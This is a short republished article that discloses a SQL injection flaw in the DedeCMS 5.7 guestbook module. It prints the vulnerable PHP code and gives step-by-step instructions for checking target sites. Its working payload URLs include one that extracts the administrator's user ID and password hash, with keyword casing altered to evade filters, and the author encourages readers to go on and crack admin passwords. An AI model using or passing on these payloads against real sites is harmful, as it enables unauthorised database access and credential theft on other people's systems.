The content of this article is about the latest sql injection vulnerability of dedecms5.7 using guestbook.php. Now I share it with everyone. Friends in need can refer to it
The affected version is 5.7
The specific code of the vulnerability file edit.inc.php:
< ?php if(!defined('DEDEINC')) exit('Request Error!'); if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS']; else $GUEST_BOOK_POS = "guestbook.php"; $id = intval($id); if(empty($job)) $job='view'; if($job=='del' && $g_isadmin) { $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' "); ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS); exit(); } else if($job=='check' && $g_isadmin) { $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' "); ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS); exit(); } else if($job=='editok') { $remsg = trim($remsg); if($remsg!='') { //管理员回复不过滤HTML By:Errorera blog:errs.cc if($g_isadmin) { $msg = "<p class='rebox'>".$msg."</p>\n".$remsg; //$remsg <br /><font color=red>管理员回复:</font> } else { $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' "); $oldmsg = "<p class='rebox'>".addslashes($row['msg'])."</p>\n"; $remsg = trimMsg(cn_substrR($remsg, 1024), 1); $msg = $oldmsg.$remsg; } } //这里没有对$msg过滤,导致可以任意注入了By:Errorera home:www.errs.cc $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' "); ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS); exit(); } //home:www.errs.cc if($g_isadmin) { $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'"); require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm'); } else { $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'"); require_once(DEDETEMPLATE.'/plus/guestbook-user.htm'); }
Requirements for the success of the vulnerability:
1. php magic_quotes_gpc=off
2. Vulnerability The file exists plus/guestbook.php and the dede_guestbook table must also exist.
How to judge whether there is a vulnerability:
First open www.xxx.com/plus/guestbook.php to see other people’s messages,
then place the mouse on [Reply/Edit] to see The ID of someone else's message. Then write down the ID
Visit:
www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID
After submission, if it is the dede5.7 version, "Successfully changed or replied to a message" will appear, which proves that the modification was successful
Jump back to www.xxx .com/plus/guestbook.php Check to see if the message ID you changed has changed to errs.cc'
If it has, it proves that the vulnerability cannot be exploited and should be turned on php magic_quotes_gpc=off
If the modification is not successful, then the content of the message ID is still the same, which proves that the vulnerability can be exploited.
Then visit again
www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
and then return, the content of the message ID will be directly modified to mysql user().
Approximately use That’s it, if you are interested, please do more research! !
Finally, I’d like to add that some people may say how to break the password of the management backend account. You will know after your own research. Anyway, it can definitely be exposed (if it can’t be exposed, I won’t post it)! !
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='
The above is the detailed content of dedecms5.7 latest sql exploits guestbook.php injection vulnerability. For more information, please follow other related articles on the PHP Chinese website!